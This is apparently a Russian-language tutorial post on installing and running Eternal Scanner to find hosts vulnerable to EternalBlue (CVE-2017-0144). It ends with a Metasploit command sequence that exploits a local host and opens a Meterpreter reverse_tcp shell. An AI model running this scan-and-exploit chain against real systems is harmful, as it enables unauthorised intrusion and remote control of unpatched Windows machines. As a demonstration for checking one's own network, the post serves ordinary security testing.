Eternal Scanner - Интернет сканер для эксплойтов CVE-2017-0144
@webwareВсем привет! В этой статье я хочу продемонстрировать работу сканера, который способен отыскать в сети уязвимые для EternalBlue ( CVE-2017-0144) — кодовое имя эксплойта, эксплуатирующего компьютерную уязвимость в Windows-реализации протокола SMB, хосты.
Итак, собственно – Eternal Scanner.

CVE-2017-0144 Описание:
Сервер SMBv1 в Microsoft Windows Vista SP2; Windows Server 2008 SP2 и R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold и R2; Windows RT 8.1; И Windows 10 Gold, 1511 и 1607; И Windows Server 2016 Позволяет атакующим удаленно выполнять произвольный код с помощью видоизмененных пакетов как в “Windows SMB Remote Code Execution Vulnerability.”. Эта уязвимость отличается от описанной в CVE-2017-0143, CVE-2017-0145, CVE-2017-0146 , И CVE-2017-0148.
Установка:
> git clone https://github.com/peterpt/eternal_scanner
> cd eternal_scanner
> ls –l

Запуск:
> ./escan

Далее, вводим интересующий нас адрес или диапазон, по маске.

Ждем окончания сканирования:

По итогу проверки обнаружилось три хоста уязвимые к данной атаке:

Результаты проверки сканер услужливо сложил в текстовый файлик:

На этом, пожалуй, все, пойду закрывать дырки…
Хотя, сначала, чуть попробую, не соврал ли сканер.
> msfconsole
> use exploit/windows/smb/ms17_010_eternalblue
> msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.158
> msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.180
> msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp
> msf exploit(ms17_010_eternalblue) >exploit

Пока, все идет ровно. И буквально через 30 сек:

Теперь можно идти, спасибо за внимание.
Источник codeby.net